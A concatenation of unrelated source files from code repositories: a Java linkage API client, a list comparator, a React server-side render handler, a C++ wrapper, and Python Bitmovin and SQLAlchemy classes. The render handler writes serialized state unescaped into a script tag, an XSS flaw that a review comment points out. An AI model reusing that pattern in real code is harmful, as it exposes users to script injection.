 * follows the same "call endpoint, then deserialize the JSON body into a typed
 * {@link BaseResponse}" pattern, which is factored into the private helpers at
 * the bottom of the class.
 *
 * @author lighting
 */
public class LinkageApi {
    /**
     * Querying linkage list.
     *
     * @param request request
     * @return linkage list
     */
    public BaseResponse<List<LinkageInfoResult>> listLinkages(LinkageListRequest request) {
        return getWithBody(OpenApiUrlConstants.LINKAGE_LIST_URL_SUFFIX, request,
                new TypeReference<BaseResponse<List<LinkageInfoResult>>>() {
                });
    }

    /**
     * Getting linkage detail.
     *
     * @param ruleId ruleId
     * @return linkage info
     */
    public BaseResponse<LinkageInfoResult> getLinkageById(String ruleId) {
        return getByRuleId(OpenApiUrlConstants.GET_LINKAGE_BY_ID_URL_SUFFIX, ruleId,
                new TypeReference<BaseResponse<LinkageInfoResult>>() {
                });
    }

    /**
     * Creating a linkage
     *
     * @param request request
     * @return linkage info
     */
    public BaseResponse<LinkageInfoResult> createLinkage(LinkageSaveRequest request) {
        return post(OpenApiUrlConstants.CREATE_LINKAGE_URL_SUFFIX, request,
                new TypeReference<BaseResponse<LinkageInfoResult>>() {
                });
    }

    /**
     * Updating a linkage.
     *
     * @param request request
     * @return linkage info
     */
    public BaseResponse<LinkageInfoResult> updateLinkage(LinkageSaveRequest request) {
        return post(OpenApiUrlConstants.UPDATE_LINKAGE_URL_SUFFIX, request,
                new TypeReference<BaseResponse<LinkageInfoResult>>() {
                });
    }

    /**
     * Querying schedule list.
     *
     * @param request request
     * @return schedule list
     */
    public BaseResponse<List<LinkageInfoResult>> listSchedules(LinkageListRequest request) {
        return getWithBody(OpenApiUrlConstants.SCHEDULE_LIST_URL_SUFFIX, request,
                new TypeReference<BaseResponse<List<LinkageInfoResult>>>() {
                });
    }

    /**
     * Getting schedule detail.
     *
     * @param ruleId ruleId
     * @return schedule info
     */
    public BaseResponse<LinkageInfoResult> getScheduleById(String ruleId) {
        return getByRuleId(OpenApiUrlConstants.GET_SCHEDULE_BY_ID_URL_SUFFIX, ruleId,
                new TypeReference<BaseResponse<LinkageInfoResult>>() {
                });
    }

    /**
     * Creating a schedule.
     *
     * @param request request
     * @return schedule info
     */
    public BaseResponse<LinkageInfoResult> createSchedule(LinkageSaveRequest request) {
        return post(OpenApiUrlConstants.CREATE_SCHEDULE_URL_SUFFIX, request,
                new TypeReference<BaseResponse<LinkageInfoResult>>() {
                });
    }

    /**
     * Updating a schedule.
     *
     * @param request request
     * @return schedule info
     */
    public BaseResponse<LinkageInfoResult> updateSchedule(LinkageSaveRequest request) {
        return post(OpenApiUrlConstants.UPDATE_SCHEDULE_URL_SUFFIX, request,
                new TypeReference<BaseResponse<LinkageInfoResult>>() {
                });
    }

    /**
     * Changing status of a smart-rule(including linkage and schedule).
     *
     * @param request request
     * @return result
     */
    public BaseResponse<Object> changeStatus(ChangeStatusRequest request) {
        return post(OpenApiUrlConstants.SMART_CHANGE_STATUS_URL_SUFFIX, request,
                new TypeReference<BaseResponse<Object>>() {
                });
    }

    /**
     * Deleting a smart rule.
     *
     * @param request request
     * @return result
     */
    public BaseResponse<Object> deleteLinkage(LinkageDeleteRequest request) {
        return post(OpenApiUrlConstants.SMART_REMOVE_URL_SUFFIX, request,
                new TypeReference<BaseResponse<Object>>() {
                });
    }

    /**
     * Performs a GET whose filter criteria travel in the request body and
     * deserializes the JSON response.
     */
    private static <T> T getWithBody(String urlSuffix, Object request, TypeReference<T> typeRef) {
        String json = HttpClientUtils.doGetWithBody(urlSuffix, JSONObject.toJSONString(request));
        return JSON.parseObject(json, typeRef);
    }

    /**
     * Performs a GET against a URL template formatted with {@code ruleId} and
     * deserializes the JSON response.
     */
    private static <T> T getByRuleId(String urlTemplate, String ruleId, TypeReference<T> typeRef) {
        String json = HttpClientUtils.doGet(String.format(urlTemplate, ruleId), null);
        return JSON.parseObject(json, typeRef);
    }

    /**
     * Performs a POST with the JSON-serialized request body and deserializes
     * the JSON response.
     */
    private static <T> T post(String urlSuffix, Object request, TypeReference<T> typeRef) {
        String json = HttpClientUtils.doPost(urlSuffix, JSONObject.toJSONString(request));
        return JSON.parseObject(json, typeRef);
    }
}
|
YuryMatskevich/ymatskevich
|
chapter_003/src/main/java/ru/job4j/comparator/ListCompare.java
|
<gh_stars>0
package ru.job4j.comparator;
import java.util.Comparator;
import java.util.List;
/**
 * Orders integer lists: lists of different sizes are ordered by size alone;
 * lists of equal size are ordered by their first differing element
 * (lexicographically).
 *
 * @author <NAME>
 * @since 0.1
 */
public class ListCompare implements Comparator<List<Integer>> {
    /**
     * Compares two lists of integers.
     *
     * <p>Fixes three defects in the original: a smaller element returned a
     * positive value (+2), a larger left list returned a negative value (-2),
     * and the loop kept running after a difference was found, so trailing
     * equal elements reset the result to 0.
     *
     * @param left  first list
     * @param right second list
     * @return negative if {@code left} orders first, positive if
     *         {@code right} orders first, 0 if equal
     */
    @Override
    public int compare(List<Integer> left, List<Integer> right) {
        // Different sizes: decided by size, matching the original's intent.
        if (left.size() != right.size()) {
            return Integer.compare(left.size(), right.size());
        }
        // Same size: the first differing element decides; return immediately.
        for (int i = 0; i < left.size(); i++) {
            int cmp = left.get(i).compareTo(right.get(i));
            if (cmp != 0) {
                return cmp;
            }
        }
        return 0;
    }
}
|
undvl/qbproj
|
server/srv_render.old.js
|
import React from 'react';
// import { createStore } from 'redux';
import configureStore from '../app/store/configureStore';
import { Provider } from 'react-redux';
import rootReducer from '../app/reducers';
import Root from '../app/containers/Root';
import { renderToString } from 'react-dom/server';
import { match, RouterContext } from 'react-router';
import routes from '../app/containers/routes_prm';
import DevTools from '../app/containers/DevTools';
import { processThemesListReq } from '../app/actions/portal';
/**
 * Express handler that server-side renders the React app for `req.url` and
 * sends the full HTML page with the serialized Redux state embedded for
 * client-side hydration.
 *
 * @param {object} req Express request; only `req.url` is used for routing.
 * @param {object} res Express response.
 */
function handleRender(req, res) {
  // Create a new Redux store instance
  // const store = createStore(rootReducer)
  const store = configureStore();
  // store.dispatch(processThemesListReq('qb2'));
  // NOTE(review): the fixed 1s delay presumably waits for async actions to
  // populate the store before snapshotting state — fragile; confirm whether
  // a promise-based wait on the dispatched actions is possible.
  setTimeout(() => {
    // Grab the initial state from our Redux store
    let preloadedState = store.getState();
    // console.log(preloadedState);
    // react-router v3 match(): resolves the URL against the route config and
    // yields either an error, a redirect, or renderable props.
    match({ routes, location: req.url }, (error, redirectLocation, renderProps) => {
      if (error) {
        res.status(500).send(error.message)
      } else if (redirectLocation) {
        res.redirect(302, redirectLocation.pathname + redirectLocation.search)
      } else if (renderProps) {
        // You can also check renderProps.components or renderProps.routes for
        // your "not found" component or route respectively, and send a 404 as
        // below, if you're using a catch-all route.
        let html;
        // Non-production builds additionally render the Redux DevTools panel.
        if( !(process.env.NODE_ENV=='production') ){
          html = renderToString(
            <Provider store={store}>
              <div>
                <RouterContext {...renderProps} />
                <DevTools />
              </div>
            </Provider>
          );
        } else {
          html = renderToString(
            <Provider store={store}>
              <div>
                <RouterContext {...renderProps} />
              </div>
            </Provider>
          );
        }
        res.status(200).send(renderFullPage(html, preloadedState));
      } else {
        res.status(404).send('Not found');
      }
    })
  }, 1000);
}
/**
 * Wraps server-rendered markup and the serialized Redux state into the
 * Handlebars page layout (`public/assets/main.html`).
 *
 * @param {string} html Pre-rendered React markup.
 * @param {object} preloadedState Redux state snapshot to embed for hydration.
 * @returns {string} The complete HTML document.
 */
function renderFullPage(html, preloadedState) {
  const Handlebars = require('handlebars');
  const fs = require('fs');
  // NOTE(review): the layout is re-read and re-compiled on every request;
  // cache the compiled template at module level if this handler stays in use.
  const fileData = fs.readFileSync(__dirname + '/../public/assets/main.html').toString();
  const layoutTemplate = Handlebars.compile(fileData);
  // SECURITY(review): JSON.stringify output is injected verbatim into a
  // <script> tag — a "</script>" sequence inside the state would break out of
  // the tag (XSS). Confirm the state is trusted or escape "<" before shipping.
  return layoutTemplate({
    content: `<div id="root"><div>${html}</div></div>`,
    script: `<script>window.__PRELOADED_STATE__ = ${JSON.stringify(preloadedState)}</script>`
  });
}

module.exports = handleRender;
|
b8raoult/magics
|
src/attributes/LevelListSelectionTypeWrapper.cc
|
/****************************** LICENSE *******************************
* (C) Copyright 1996-2017 ECMWF.
*
* This software is licensed under the terms of the Apache Licence Version 2.0
* which can be obtained at http://www.apache.org/licenses/LICENSE-2.0.
* In applying this licence, ECMWF does not waive the privileges and immunities
* granted to it by virtue of its status as an intergovernmental organisation nor
* does it submit to any jurisdiction.
******************************* LICENSE *******************************/
/*! \\file LevelListSelectionTypeAttributes.h
\\brief Definition of LevelListSelectionType Attributes class.
This file is automatically generated.
Do Not Edit!
*/
#include "MagRequest.h"
#include "LevelListSelectionTypeWrapper.h"
#include "MagicsParameter.h"
#include "Factory.h"
#include "MagTranslator.h"
#include "MagicsGlobal.h"
using namespace magics;
// NOTE(review): per the file header this file is auto-generated ("Do Not
// Edit!") — any change here should be made in the generator instead.

// Default constructor: owns a freshly allocated LevelListSelectionType and
// registers it with the base LevelSelection wrapper.
LevelListSelectionTypeWrapper::LevelListSelectionTypeWrapper(): levellistselectiontype_(new LevelListSelectionType())
{
	LevelSelectionWrapper::object(levellistselectiontype_);
}
// Wrapping constructor: adopts an externally created object and registers it
// with the base wrapper.
LevelListSelectionTypeWrapper::LevelListSelectionTypeWrapper(LevelListSelectionType* levellistselectiontype): levellistselectiontype_(levellistselectiontype)
{
	LevelSelectionWrapper::object(levellistselectiontype_);
}
LevelListSelectionTypeWrapper::~LevelListSelectionTypeWrapper()
{
}
// Populates the wrapped object from a MagRequest: forwards base-class
// parameters, then copies every CONTOUR_LEVEL_LIST value (if any) into the
// selection's level list.
void LevelListSelectionTypeWrapper::set(const MagRequest& request)
{
	LevelSelectionWrapper::set(request);
	doublearray  list_value;
	for (int i = 0; i < request.countValues("CONTOUR_LEVEL_LIST"); i++)
		list_value.push_back((double)request("CONTOUR_LEVEL_LIST", i));
	if ( !list_value.empty() )
		levellistselectiontype_->list_ = list_value;
}
// Debug representation; intentionally minimal in generated wrappers.
void LevelListSelectionTypeWrapper::print(ostream& out)  const
{
	out << "LevelListSelectionTypeWrapper[]";
}
|
koraygulcu/bitmovin-python
|
bitmovin/services/manifests/manifest_service.py
|
from bitmovin.bitmovin_object import BitmovinObject
from .dash_manifest_service import DASH
from .hls_manifest_service import HLS
class ManifestService(BitmovinObject):
    """Facade bundling the manifest sub-services (DASH and HLS).

    Each sub-service is constructed with the same HTTP client so callers can
    reach both protocols through a single service object.
    """

    def __init__(self, http_client):
        super().__init__()
        self.http_client = http_client
        self.DASH = DASH(http_client=http_client)
        self.HLS = HLS(http_client=http_client)
|
NiHighlism/Minerva
|
app/main/models/reactions.py
|
<reponame>NiHighlism/Minerva<filename>app/main/models/reactions.py
"""
DB Model for Likes and
relevant junction tables
"""
import datetime
from sqlalchemy.sql import and_, select
from app.main import db, login_manager
class Reaction(db.Model):
    """
    Reaction (like/dislike value) left by a user on a base entity.

    Columns
    -----------
    :id: int [pk]
    :value: int
    :user_id: int [Foreign Key -> User.id]
    :base_id: int [Foreign Key -> Base.id]
    :creation_time: DateTime
    """
    # Columns
    id = db.Column(db.Integer, primary_key=True)
    value = db.Column(db.Integer)
    user_id = db.Column(db.Integer, db.ForeignKey("user.id"))
    base_id = db.Column(db.Integer, db.ForeignKey("base.id"))
    # Pass the callable, not its result: the original `datetime.now()` was
    # evaluated once at import time, stamping every row with the same moment.
    creation_time = db.Column(db.DateTime, default=datetime.datetime.now)

    def __init__(self, value, user_id, post_id):
        self.value = value
        self.user_id = user_id
        # NOTE(review): the model has no `post_id` column; the original set
        # `self.post_id`, which SQLAlchemy never persists. Mapping the argument
        # onto `base_id` (the only FK here) — confirm against callers. The
        # parameter name is kept for backward compatibility.
        self.base_id = post_id

    def update_col(self, key, value):
        # Set a single column attribute and commit immediately.
        setattr(self, key, value)
        db.session.commit()
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.